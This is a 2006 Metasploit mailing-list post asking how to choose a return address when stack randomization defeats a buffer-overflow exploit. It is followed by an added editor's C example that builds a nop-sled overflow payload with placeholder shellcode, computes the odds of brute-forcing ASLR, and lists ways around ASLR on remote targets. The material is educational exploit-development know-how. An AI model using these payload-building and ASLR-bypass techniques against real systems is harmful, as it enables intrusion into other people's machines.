Metasploit mailing list archives

stack randomization


From: 0x0804 at gmail.com (curious one)
Date: Mon, 10 Apr 2006 16:02:48 +0400

Is there a memory protection mechanism of some kind in Slackware? I did the
following to check whether I can land in the same nop zone, if not at the exact
address then still somewhere in the nop zone. I was following the server code
as listed in this tutorial:
http://www.exploitx.com/forum/azbb.php?1112286936 . Now when I run
this code in gdb and overflow it with an input of 1034 A's, I can overwrite
EIP completely:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


So I did a (gdb) x/200bx $esp-200 and selected an address which was somewhere
in the middle of the A's zone: 0xbfe4b338. For ease I chose the 11th line of
the command's output to see whether the next time I get an address in the same range.

I killed the server and repeated the same process over and over again.
Every time the chosen position reflected a different register, and not just
different, it was a difference of quite a bit. Following are the addresses
reflected in the chosen position in various iterations:

1st iteration
0xbfe4b338

2nd iteration
0xbfd1bcb8

3rd iteration
0xbf898228

4th iteration
0xbffe7208

If the total length of my shellcode is to be 2000 (7D0h), how would I go about
choosing the return address?

As the scenario I am trying to simulate is of a remote exploit, how would I
get around this randomization? Any good reads about this?

Cheers
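Added example (editor's note, not part of the post above or the exploitx tutorial it links): the four addresses the poster observed for one stack slot spread over roughly 7.3 MB, so a fixed return address only works when the nop sled is large relative to that spread. The C program below reads the Linux ASLR switch (/proc/sys/kernel/randomize_va_space, present from kernel 2.6.12), measures the spread of the observed addresses, computes the chance that one guess lands in a sled of a given length and the mean number of tries that implies, and lays out the input as [nop sled][shellcode][return address over saved EIP]. It assumes the saved EIP starts 1030 bytes into the input (since 1034 bytes overwrote all four bytes of it), that the buffer base is spread uniformly over the observed range, and it uses 60 bytes of int3 (0xCC) as a placeholder in place of real shellcode; all three are the editor's assumptions.

```c
/* Added example, not from the post or the linked tutorial: sizing a nop
 * sled against the observed stack spread and laying out the overflow input.
 * Assumed: the saved EIP starts 1030 bytes into the input (1034 bytes
 * overwrote all four bytes of it), the stack base is uniformly spread over
 * the observed range, and the "shellcode" is a placeholder of int3 bytes. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90          /* x86 one-byte nop */
#define EIP_OFFSET 1030   /* assumption, see above */

/* The four addresses the post reports for the same stack slot across runs. */
const uint32_t observed[] = {0xbfe4b338, 0xbfd1bcb8, 0xbf898228, 0xbffe7208};
const size_t observed_count = sizeof(observed) / sizeof(observed[0]);

/* First thing to check on Linux: the ASLR policy in /proc. 0 = off,
 * 1 = stack, mmap and vdso randomised, 2 = brk as well. Returns -1 if the
 * file is missing (non-Linux, or a kernel before 2.6.12). */
int randomize_va_space_setting(void) {
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (f) {
        if (fscanf(f, "%d", &v) != 1) v = -1;
        fclose(f);
    }
    return v;
}

/* Spread of one stack slot over n runs: highest minus lowest address. */
uint32_t stack_span(const uint32_t *addrs, size_t n) {
    uint32_t lo = addrs[0], hi = addrs[0];
    for (size_t i = 1; i < n; i++) {
        if (addrs[i] < lo) lo = addrs[i];
        if (addrs[i] > hi) hi = addrs[i];
    }
    return hi - lo;
}

/* Chance that one fixed guess lands inside a sled of sled_len bytes when the
 * buffer moves uniformly over span bytes between runs (assumed uniform). */
double hit_probability(uint32_t sled_len, uint32_t span) {
    if (span == 0 || sled_len >= span) return 1.0;
    return (double)sled_len / (double)span;
}

/* Mean number of independent tries before the first hit; -1 if p is 0. */
double expected_attempts(double p) {
    return p > 0.0 ? 1.0 / p : -1.0;
}

/* Aim at the middle of the sled so the guess tolerates drift either way. */
uint32_t aim_into_sled(uint32_t sled_start_guess, uint32_t sled_len) {
    return sled_start_guess + sled_len / 2;
}

/* Lay out the input: [nop sled][shellcode][return address over saved EIP].
 * Returns the bytes written, or 0 if the shellcode does not fit before EIP
 * or the output buffer is too small. */
size_t build_payload(uint8_t *out, size_t out_cap, size_t eip_offset,
                     const uint8_t *sc, size_t sc_len, uint32_t ret,
                     uint32_t *sled_len_out) {
    size_t total = eip_offset + 4;
    if (sc_len > eip_offset || total > out_cap) return 0;
    size_t sled = eip_offset - sc_len;
    memset(out, NOP, sled);
    memcpy(out + sled, sc, sc_len);
    out[eip_offset]     = (uint8_t)(ret & 0xff);          /* little-endian x86 */
    out[eip_offset + 1] = (uint8_t)((ret >> 8) & 0xff);
    out[eip_offset + 2] = (uint8_t)((ret >> 16) & 0xff);
    out[eip_offset + 3] = (uint8_t)((ret >> 24) & 0xff);
    if (sled_len_out) *sled_len_out = (uint32_t)sled;
    return total;
}

/* Worked instance with the post's numbers: 60 placeholder bytes of int3,
 * return address set to the mid-sled slot seen in the first run. */
uint8_t placeholder_shellcode[60];
uint8_t payload[2048];
uint32_t demo_sled_len;

size_t build_demo_payload(void) {
    memset(placeholder_shellcode, 0xcc, sizeof placeholder_shellcode);
    return build_payload(payload, sizeof payload, EIP_OFFSET,
                         placeholder_shellcode, sizeof placeholder_shellcode,
                         0xbfe4b338, &demo_sled_len);
}

int main(void) {
    uint32_t span = stack_span(observed, observed_count);
    size_t n = build_demo_payload();
    double p = hit_probability(demo_sled_len, span);
    printf("randomize_va_space: %d\n", randomize_va_space_setting());
    printf("observed spread: 0x%08x (%u bytes)\n", span, span);
    printf("payload %zu bytes, sled %u bytes, p(hit) = %.3g, ~%.0f tries\n",
           n, demo_sled_len, p, expected_attempts(p));
    return 0;
}
```

With the post's four samples the spread is 0x74EFE0 bytes, so a 970-byte sled gives about a 1 in 7900 chance per attempt; a forking server that does not re-exec keeps the same layout across connections, which is why repeated connections against one process can still work, while a server that re-execs re-randomises every time. If randomize_va_space reads 0 the addresses would not move at all, which is the first thing to verify before tuning the sled. The general ways around this on a remote target are to make the sled as large as the bug allows and brute-force, to return through an address that does not move (a jmp/call esp in a non-relocated binary), or to leak a stack address first.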